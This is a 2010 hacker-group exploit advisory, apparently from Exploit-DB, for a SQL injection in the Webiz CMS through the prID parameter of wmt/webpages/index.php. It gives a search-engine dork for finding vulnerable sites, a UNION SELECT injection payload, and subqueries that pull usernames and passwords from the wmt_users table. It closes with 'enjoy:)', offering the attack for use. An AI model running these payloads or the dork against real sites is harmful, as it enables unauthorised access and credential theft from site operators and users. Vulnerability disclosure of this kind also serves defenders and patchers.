@@@@@@@@ @@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@
@@@@ @@@@@@@@@@ @@@ @@@@@@ @ @@@@
@@@@@@@@@ @@@@@@@ @@@@ @@ @@@@@ @@ @@ @@ @@
@@@@ @@@@@@ '' @@ @@@@@@@ @ @@@@
@@@@ @@@@@@@@@ @@ @@@ @@@@@@@@@ @@ @
VXA@HOTMAIL.FR
zn@live.de
VBHACKER.NET
===========================================================================
WEBIZ SQL INJECTION VULNERABILITY
===========================================================================
============================================================================
ABOUT ME
============================================================================
== Found By : THE PIRATOR ---> AYMEN AHMADI
==: kannibal615 ---> WALID TGS
== website : www.vbhacker.net/vb
==
== email: vxa [at] hotmail [dot] fr
==: zn[at] live[dot] de
==
==
== Thanks to: Pc-InSeCt / emptyzero
==: DAK / l3G3NDS / m0j4h3d
==: V!Ru$_T4ckJ3n / __MiM0__
==: / PrideArabs / DIESEL
==: ALL VBHACKER MEMBERS
==
============================================================================
INFORMATIONS
============================================================================
== Developers : www.webiz.gr
== vulner : SQL INJECTION
== Bug: ../wmt/webpages/index.php
== Variable1: &prID=
== Variable2: &apprec=
==
== dork : Powered by Webiz inurl:'wmt/webpages'
==
============================================================================
============================================================================
EXPLOIT
============================================================================
==
==Dork : Powered by Webiz inurl:'wmt/webpages'
==
==URL: ../wmt/webpages/index.php?lid=&pid=&prID=[Injection Here]
==
==Demo: http://localhost/wmt/webpages/index.php?lid=&pid=&prID=999.9'
==
==exploit: index.php?lid=&pid=&prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20--
==
==database : MySQL 5
==
++
==
==*** Insert This Code in THE VALID COLUMN ***
++ +
==*** CHANGE [DATABASE_NAME] ***
==
==
==
==
==USERNAME
==
==(SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
==
==
==USER PASSWORD
==
== (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
=============================================================================
enjoy:)
==Exploit-db.com
==VBHACKER.NET/VB
==kannibal615Copyright (c) 2010